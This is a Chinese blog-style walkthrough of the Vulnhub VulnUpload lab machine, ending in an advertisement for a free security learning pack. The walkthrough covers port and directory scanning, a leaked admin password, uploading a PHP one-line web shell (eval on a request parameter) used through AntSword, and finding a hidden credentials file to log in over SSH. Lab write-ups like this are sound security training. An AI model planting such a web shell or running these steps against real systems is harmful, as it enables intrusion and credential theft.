Vulnhub-VulnUpload靶机渗透实战
1
免责声明
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
2
内容速览
前言
这是网络安全自修室每周带星球小伙伴一起实战的第12台靶机,欢迎有兴趣的小伙伴一起加入实操,毕竟实践出真知!
靶机可从Vulnhub平台 免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标!
攻击机:Kali Linux
靶机环境:Linux-VulnUpload
所用工具:nmap | Burpsuite | 蚁剑
0x00 知识点
- robots.txt 扫描
- 蚁剑基础连接使用
- 隐藏文件查找
0x01靶机搭建
首先从上面地址中下载好靶机,并直接解压导入虚拟机后,将该虚拟机的网路设为NAT模式。之后打开虚拟机,进入到开机界面。(这里一定要迅速把鼠标点进去,之后快速摁向下方向键,否则,会自动帮你进入第一个。)跟着步骤走。。。
选择进入root模式。。。之后就到了考验命令行的时候了。
先输入:
mount -o rw,remount /之后再输入
ifconfig -a查看你的网卡名称,并记住哦,以后用的到。。使用vim编辑器,去修改/etc/network/interfaces 文件中的数据(如图输入)
将这里改成你刚刚看到的网卡名称(我的图就是已经改完的了哈。)之后保存退出,w是保存,q是退出,wq是保存并退出
并且每个命令如果后面加!的话就是强制执行之后,你的环境就搭建好了,重启如下为正常启动后的画面
0x02 信息搜集
端口发现
arp-scan -l扫描网段
这里发现靶机的IP地址为192.168.15.128,攻击机kali的IP地址为192.168.15.131
使用nmap进行深度的扫描
nmap -A -T4 -p- 192.168.15.128综上信息搜集可以发现,目标服务器为Linux系统,开放了ssh 22端口,http 80端口,重点考虑从web页面找寻突破口
0x03 获取Flag
第一个flag
这里发现靶机开放了ssh 22端口,http 80端口。并在robots.txt中,发现疑似flag。
我们尝试浏览器输入 http://192.168.15.128/flag 去访问
发现flag1:{8734509128730458630012095}
第二个flag
接下来我们尝试使用dirsearch扫描一下网页目录
dirsearch -u 192.168.15.128http://192.168.15.128/admin_area/
http://192.168.15.128/assets/
http://192.168.15.128/css/
在浏览器中访问http://192.168.15.128/admin_area/,F12发现了admin用户以及其密码:3v1l_H@ck3r。
发现flag2:{7412574125871236547895214}
第三个flag
浏览器访问http://192.168.15.128 ,使用刚才得到的admin用户及密码3v1l_H@ck3r尝试登录。
成功进入后发现是可以上传文件的页面,可以尝试是否存在文件上传漏洞
写入一句话木马到文件中
<?phpeval($_REQUEST[password]); ?>使用中国蚁剑进行连接
连接成功,说明存在文件上传漏洞
查看hint.txt文件,发现flag3以及提示查找用户technawi
发现flag3:{7645110034526579012345670}
第四个flag
刚才在第三个flag提示我们用technawi去读取flag.txt文件,可以在隐藏文件中找到用户的信息
try to find user technawi password to read the flag.txt file, you can find it in a hidden file蚁剑打开虚拟终端,查找用户信息,2>/dev/null是过滤掉类似没有权限的信息
find / -user 'technawi' 2>/dev/null此时我们看到了一个特殊的文件/etc/mysql/conf.d/credentials.txt ,我们尝试去读一下里面的信息,得到flag4以及username和password
发现flag4:{7845658974123568974185412}
第五个flag
根据flag3的提示,我们登录technawi用户直接查看/var/www/html/flag.txt
ssh technawi@192.168.15.128 cat /var/www/html/flag.txt发现flag5:{5473215946785213456975249}
0x04 总结
此靶机一共找到了5个flag,难度不大,但是流程全面,分别通过端口扫描、网站目录扫描得到账密成功登录网站,并通过发现文件上传漏洞,利用一句话木马传到靶机,再通过蚁剑进行连接,最后查找并登录technawi用户查看隐藏文件flag.txt得到全部flag,完成该靶机可以熟悉掌握渗透的初步流程。
学习资源
如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你
知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。
读者福利 |CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
一、知识库价值
深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。
实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
二、部分核心内容展示
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。
1、网络安全意识
2、Linux操作系统
3、WEB架构基础与HTTP协议
4、Web渗透测试
5、渗透测试案例分享
6、渗透测试实战技巧
7、攻防对战实战
8、CTF之MISC实战讲解
三、适合学习的人群
基础适配人群
- 零基础转型者:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链;
- 开发/运维人员:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展或者转行就业;
- 应届毕业生:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期;
能力提升适配
1、技术爱好者:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者;
2、安全从业者:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力;
3、合规需求者:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员;
因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】
;
因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】
文章来自网上,侵权请联系博主